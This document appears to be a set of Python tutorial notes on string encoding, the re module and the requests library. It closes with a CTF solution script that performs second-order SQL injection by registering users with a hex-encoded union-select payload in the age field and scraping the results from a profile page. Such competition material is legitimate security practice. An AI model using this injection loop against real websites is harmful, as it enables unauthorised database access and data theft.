Notes on using Python requests

Character encoding in Python

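A u prefix on a string literal makes it a Unicode string. In Python 2, Chinese text must be marked this way; otherwise it is stored as raw bytes, and it turns into mojibake as soon as it is converted to another encoding.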

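An r prefix makes a raw string: every character is taken literally and backslashes are not treated as escapes. This is common for regular expressions used with the re module.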

A b prefix marks the literal as a byte string.
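The prefixes above are described for Python 2. As a minimal sketch of how they behave in Python 3 (where every str is already Unicode and the u prefix is accepted but changes nothing), assuming Python 3.3 or later:

```python
# Python 3: str literals are Unicode already; u'' is allowed but redundant
s = u'中文'
print(type(s).__name__, s == '中文')   # str True

# r prefix: backslashes stay as literal characters (handy for regex patterns)
raw = r'\d+\n'
print(len(raw))                        # 5 characters: \ d + \ n

# b prefix: a bytes literal (only ASCII characters may appear inside it)
data = b'abc'
print(type(data).__name__, list(data)) # bytes [97, 98, 99]
```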

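ord() takes a single character and returns its integer code: the ASCII value, or the Unicode code point for a Unicode character. chr() goes the other way: in Python 2 it takes an integer in range(256) (0 to 255) and returns the corresponding one-byte character; larger Unicode code points need unichr().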
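A short Python 3 sketch of the round trip between characters and code points. Note that in Python 3 chr() is no longer limited to 0 to 255: it accepts any code point up to 0x10FFFF, so unichr() is gone.

```python
# ord(): one character -> its integer code point
print(ord('A'))      # 65
print(ord('中'))     # 20013, i.e. U+4E2D

# chr(): integer code point -> one character (any value up to 0x10FFFF in Python 3)
print(chr(65))       # A
print(chr(0x4E2D))   # 中

# round trip over a whole string
codes = [ord(c) for c in '中文']
print(codes)                          # [20013, 25991]
print(''.join(chr(c) for c in codes)) # 中文
```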

In Python 2, use decode('utf-8') to convert a UTF-8-encoded str 'xxx' into the Unicode string u'xxx':

>>> 'abc'.decode('utf-8')
u'abc'
>>> '\xe4\xb8\xad\xe6\x96\x87'.decode('utf-8')
u'\u4e2d\u6587'
>>> print '\xe4\xb8\xad\xe6\x96\x87'.decode('utf-8')
中文

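decode converts a byte string in some other encoding into Unicode. For example, str1.decode('gb2312') converts the gb2312-encoded string str1 into a Unicode string.
encode goes the other way, converting a Unicode string into a byte string in the given encoding. For example, str2.encode('gb2312') converts the Unicode string str2 into gb2312-encoded bytes.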
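For comparison, a minimal Python 3 sketch of the same idea. In Python 3 text is str and encoded data is bytes, so encode() always goes str to bytes and decode() always goes bytes to str. The UTF-8 bytes match the Python 2 example above; the gb2312 bytes show that the same text has a different byte representation in another codec.

```python
text = '中文'

utf8_bytes = text.encode('utf-8')   # str -> bytes
gb_bytes = text.encode('gb2312')    # same text, different bytes

print(utf8_bytes)  # b'\xe4\xb8\xad\xe6\x96\x87'
print(gb_bytes)    # b'\xd6\xd0\xce\xc4'

# decoding with the matching codec restores the original text
print(utf8_bytes.decode('utf-8') == text)   # True
print(gb_bytes.decode('gb2312') == text)    # True

# transcoding: decode with the source codec, then encode with the target codec
print(utf8_bytes.decode('utf-8').encode('gb2312') == gb_bytes)  # True
```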

Using the re module for regular expressions

The compile method


import re
# Compile the regular expression into a Pattern object
pattern = re.compile(r'\d+')
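A small sketch of why compiling is useful: the compiled Pattern can be reused on many strings, and flags are passed once at compile time. The sample strings here are made up for illustration.

```python
import re

# Compile once and reuse; module-level functions such as re.findall() compile
# the pattern on every call, although re keeps a cache of recent patterns.
pattern = re.compile(r'\d+')

lines = ['order 42', 'no digits', 'ids 7 and 8']
print([pattern.findall(line) for line in lines])  # [['42'], [], ['7', '8']]

# Flags are given to compile(), e.g. case-insensitive matching
word = re.compile(r'hello', re.IGNORECASE)
print(bool(word.search('Say HELLO')))             # True
```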

The match method

match(string[, pos[, endpos]])

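match only looks for a match at the beginning of the string (or at pos, if given). string is the string to match against; pos and endpos set the start and end positions, with endpos exclusive. Example: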

>>> import re
>>> pattern = re.compile(r'\d+')                    # match one or more digits
>>> m = pattern.match('one12twothree34four')        # tries the start only: no match
>>> print m
None
>>> m = pattern.match('one12twothree34four', 2, 10) # starts at 'e': no match
>>> print m
None
>>> m = pattern.match('one12twothree34four', 3, 10) # starts at '1': match
>>> print m                                         # returns a Match object
<_sre.SRE_Match object at 0x10a42aac0>
>>> m.group(0)   # the 0 can be omitted
'12'
>>> m.start(0)   # the 0 can be omitted
3
>>> m.end(0)     # the 0 can be omitted
5
>>> m.span(0)    # the 0 can be omitted
(3, 5)
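The same calls in Python 3, plus two details of pos and endpos worth knowing: endpos acts as if the string were cut off there, and a ^ in the pattern still means the real start of the string rather than pos (as the re documentation notes). In recent Python 3 versions a match prints as something like <re.Match object; span=(3, 5), match='12'> instead of the _sre repr above.

```python
import re

pattern = re.compile(r'\d+')
s = 'one12twothree34four'

# match() is anchored at pos: it only succeeds if a match starts exactly there
print(pattern.match(s))            # None
m = pattern.match(s, 3, 10)
print(m.group(), m.span())         # 12 (3, 5)

# endpos is exclusive: only s[3:4] == '1' is visible here
print(pattern.match(s, 3, 4).group())  # 1

# '^' matches at the real beginning of the string, not at pos
caret = re.compile(r'^\d+')
print(caret.match(s, 3))           # None
```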

The search method

search(string[, pos[, endpos]])

search looks for a match anywhere in the string, whereas match only tries the start:

>>> import re
>>> pattern = re.compile(r'\d+')
>>> m = pattern.search('one12twothree34four')  # match() would find nothing here
>>> m
<_sre.SRE_Match object at 0x10cc03ac0>
>>> m.group()
'12'
>>> m = pattern.search('one12twothree34four', 10, 30)  # search only within positions 10 to 30
>>> m
<_sre.SRE_Match object at 0x10cc03b28>
>>> m.group()
'34'
>>> m.span()
(13, 15)
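A Python 3 sketch contrasting the two methods on the same string. Both return None when nothing is found, so check the result before calling .group(); search() also stops at the first hit, so reaching the later '34' needs a start position (or findall/finditer).

```python
import re

pattern = re.compile(r'\d+')
s = 'one12twothree34four'

results = {}
for name, method in (('match', pattern.match), ('search', pattern.search)):
    m = method(s)
    # both methods return None on failure, so guard before .group()
    results[name] = m.group() if m else None

print(results)                        # {'match': None, 'search': '12'}

# search() returns only the first match; start later to reach '34'
print(pattern.search(s, 5).group())   # 34
```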

findall
findall is especially useful: it searches the entire string and returns every match as a list.

findall(string[, pos[, endpos]])
As with match, pos and endpos set the start and end positions.

Example:

import re

pattern = re.compile(r'\d+')   # find runs of digits
result1 = pattern.findall('hello 123456 789')
result2 = pattern.findall('one1two2three3four4', 0, 10)

print(result1)
print(result2)

Output:

['123456', '789']
['1', '2']

More uses of findall(): https://www.cnblogs.com/xieshengsen/p/6727064.html
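The behaviour of findall() that most often surprises people is how capture groups change what it returns. A small Python 3 sketch (the sample text is made up), together with finditer(), which yields Match objects so positions are available too:

```python
import re

text = 'tom:18, amy:21'

# no groups: a list of whole matches
print(re.findall(r'\w+:\d+', text))      # ['tom:18', 'amy:21']

# one group: a list of that group's text only
print(re.findall(r'(\w+):\d+', text))    # ['tom', 'amy']

# several groups: a list of tuples, one per match
print(re.findall(r'(\w+):(\d+)', text))  # [('tom', '18'), ('amy', '21')]

# finditer() yields Match objects, which also carry positions
for m in re.finditer(r'\d+', text):
    print(m.group(), m.span())           # 18 (4, 6), then 21 (12, 14)
```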

The requests module

GET requests

payload = {'key1': 'value1', 'key2': 'value2', 'key3': None}
r = requests.get('http://httpbin.org/get', params=payload)

r.url is http://httpbin.org/get?key1=value1&key2=value2 (keys whose value is None, such as key3, are not added to the URL).
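To check how params turns into a query string without sending anything, one option is to build a requests.Request and call .prepare() on it; the prepared request's url is what would be sent. A sketch assuming requests is installed and Python 3.7+ (so dict order is preserved). The second payload shows that a list value repeats the key.

```python
import requests

# None values are dropped from the query string
payload = {'key1': 'value1', 'key2': 'value2', 'key3': None}
req_none = requests.Request('GET', 'http://httpbin.org/get', params=payload).prepare()
print(req_none.url)  # http://httpbin.org/get?key1=value1&key2=value2

# a list value produces the same key several times
multi = {'key1': 'value1', 'key2': ['value2', 'value3']}
req_list = requests.Request('GET', 'http://httpbin.org/get', params=multi).prepare()
print(req_list.url)  # http://httpbin.org/get?key1=value1&key2=value2&key2=value3
```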

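r.text returns the body decoded with the encoding requests infers from the response headers; set r.encoding = 'gbk' (or another codec) before reading r.text to decode it differently.

r.content returns the raw body as bytes.

r.json() parses the body as JSON and raises an exception if the body is not valid JSON.

r.status_code returns the HTTP status code of the response.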
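The attributes above can be tried offline by filling in a requests.models.Response by hand. This is only a testing shortcut: it sets the private attribute _content directly, which normal code should never do, and the GBK body is made up for illustration. It shows that r.text depends on r.encoding while r.content does not, and that a failing r.json() can be caught as ValueError (the error requests raises subclasses it).

```python
import requests

# Simulated response; _content is private and is set here only to avoid network access
r = requests.models.Response()
r.status_code = 200
r._content = '{"msg": "中文"}'.encode('gbk')  # pretend the server sent GBK bytes

print(r.status_code)          # 200
print(r.content)              # raw bytes, never decoded

r.encoding = 'utf-8'          # wrong codec: undecodable bytes become U+FFFD
print('\ufffd' in r.text)     # True

r.encoding = 'gbk'            # correct codec
print(r.text)                 # {"msg": "中文"}
print(r.json()['msg'])        # 中文

# r.json() raises when the body is not JSON
bad = requests.models.Response()
bad._content = b'<html>not json</html>'
bad.encoding = 'utf-8'
try:
    bad.json()
    bad_is_json = True
except ValueError:
    bad_is_json = False
print(bad_is_json)            # False
```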

POST requests

url = 'https://api.github.com/some/endpoint'
payload = {"some": "data"}
r = requests.post(url, data=payload)
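data= sends the dict form-encoded. requests also accepts json=, which serialises the dict and sets a JSON content type. A sketch comparing the two with prepared requests, so nothing is actually sent; it assumes requests is installed.

```python
import json

import requests

url = 'https://api.github.com/some/endpoint'
payload = {'some': 'data'}

# data=dict -> form-encoded body
form = requests.Request('POST', url, data=payload).prepare()
print(form.headers['Content-Type'])  # application/x-www-form-urlencoded
print(form.body)                     # some=data

# json=dict -> JSON body, serialised by requests
js = requests.Request('POST', url, json=payload).prepare()
print(js.headers['Content-Type'])    # application/json
print(json.loads(js.body))           # {'some': 'data'}
```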
Example: script for the "three hit" challenge from the Qiangwang Cup (强网杯) CTF:
import binascii
import re
import uuid

import requests

reg_url = "http://39.107.32.29:10000/index.php?func=register"
log_url = "http://39.107.32.29:10000/index.php?func=login"
pro_url = "http://39.107.32.29:10000/profile.php"
cookies = {"PHPSESSID": "lsosjp3spgek89gd4t5ibrc9j3"}
proxies = {"http": "http://127.0.0.1:8080"}  # send traffic through a local proxy

if __name__ == "__main__":
    prefix = str(uuid.uuid1())[0:5]  # random prefix so each run registers new usernames
    n = 1
    while True:
        query = input("> ")
        # query = "1 and 1=2 union select 1,(%s),3,4-- data" % query
        # hex-encode the payload so it can be sent as a 0x... literal
        query = binascii.hexlify(query.encode()).decode()
        user = "%s%d" % (prefix, n)
        # register a new user whose age field carries the payload
        requests.post(url=reg_url, cookies=cookies,
                      data={"username": user, "age": "0x%s" % query, "password": "hello"},
                      proxies=proxies)
        # log in as that user
        requests.post(url=log_url, cookies=cookies,
                      data={"username": user, "password": "hello"}, proxies=proxies)
        # fetch the profile page and extract the query output from it
        r = requests.get(url=pro_url, cookies=cookies, proxies=proxies)
        for result in re.findall(r'whose name is <a>(.*)</a> isalso', r.text):
            print(result)
        n += 1

THE END

References

http://funhacks.net/2016/12/27/regular_expression/

https://www.liaoxuefeng.com/wiki/0014316089557264a6b348958f449949df42a6d3a2e542c000/001431664106267f12e9bef7ee14cf6a8776a479bdec9b9000

http://docs.python-requests.org/zh_CN/latest/user/quickstart.html